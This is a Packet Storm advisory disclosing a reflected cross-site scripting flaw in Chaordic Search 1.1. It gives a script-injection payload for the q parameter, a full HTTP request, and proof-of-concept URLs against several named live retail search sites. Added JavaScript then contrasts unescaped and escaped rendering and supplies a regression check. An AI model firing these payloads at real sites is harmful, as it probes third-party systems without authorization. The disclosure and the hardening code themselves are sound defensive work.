Chaordic Search 1.1 Cross Site Scripting

2016-12-09T00:00:00
ID PACKETSTORM:140099
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2016-12-09T00:00:00

Description

                                        
`[+] Cross Site Scripting on Chaordic Search v1.1  
  
[+] Date: 09/12/2016  
  
[+] Risk: LOW  
  
[+] CWE number: CWE-79  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Vendor Homepage: https://www.chaordic.com.br/  
  
[+] Contact: felipe_andrian@hotmail.com  
  
[+] Tested on: GNU/Linux  
  
[+] Exploit :   
  
http://busca.host/?q= [ XSS PAYLOAD ]  
  
[+] Payload :  
  
?q="><script>alert('XSS Payload')</script>  
  
[+] Example :  
  
GET /?q=%22%3E%3Cscript%3Ealert(%27OXSS Payload%27)%3C/script%3E HTTP/1.1  
Host: busca.submarino.com.br  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: chaordic_anonymousUserId=anon-a1fa1360-bde5-11e6-afd4-a1f7c36320fb; cs_preferenceOrder=popularity; csDisplayType=grid  
Connection: keep-alive  
  
[+] Poc :  
  
http://busca.saraiva.com.br/?q="><script>alert('XSS')</script>   
http://busca.camisariacolombo.com.br/?q="><script>alert('XSS')</script>  
http://busca.dentalcremer.com.br/?q="><script>alert('XSS')</script>  
`
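
Added example, not part of the original advisory and not the vendor's code: the payload above begins with `">`, which is consistent with the `q` value being reflected inside a double-quoted HTML attribute. Assuming that context, the following shows the unencoded reflection beside an output-encoded version and a regression check a defender can run; the template, function names and sample query string are hypothetical and constructed for illustration.

```javascript
// Hypothetical search-box template; the real Chaordic Search markup is not shown in the advisory.

// Characters that must be encoded before a value is placed in HTML text or a quoted attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Decode one parameter from a raw query string, as the server would before rendering.
function queryParam(rawQuery, name) {
  return new URLSearchParams(rawQuery).get(name) ?? '';
}

// Vulnerable pattern (CWE-79): q is concatenated into the attribute unencoded,
// so a leading "> closes the attribute and the tag, and what follows is parsed as markup.
function renderSearchBoxUnsafe(q) {
  return `<input type="text" name="q" value="${q}">`;
}

// Hardened pattern: q is encoded for the HTML context it lands in, so it stays data.
function renderSearchBoxSafe(q) {
  return `<input type="text" name="q" value="${escapeHtml(q)}">`;
}

// Regression check for rendered output: did request data become a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: URL-encoded form of the payload listed under "[+] Payload".
const SAMPLE_QUERY = 'q=%22%3E%3Cscript%3Ealert(%27XSS%20Payload%27)%3C/script%3E';

const q = queryParam(SAMPLE_QUERY, 'q');
console.log('unsafe:', renderSearchBoxUnsafe(q), '->', containsScriptTag(renderSearchBoxUnsafe(q)));
console.log('safe:  ', renderSearchBoxSafe(q), '->', containsScriptTag(renderSearchBoxSafe(q)));
```

The same `containsScriptTag` check can be run against a captured response body for `/?q=...` to confirm that a deployed fix encodes the parameter.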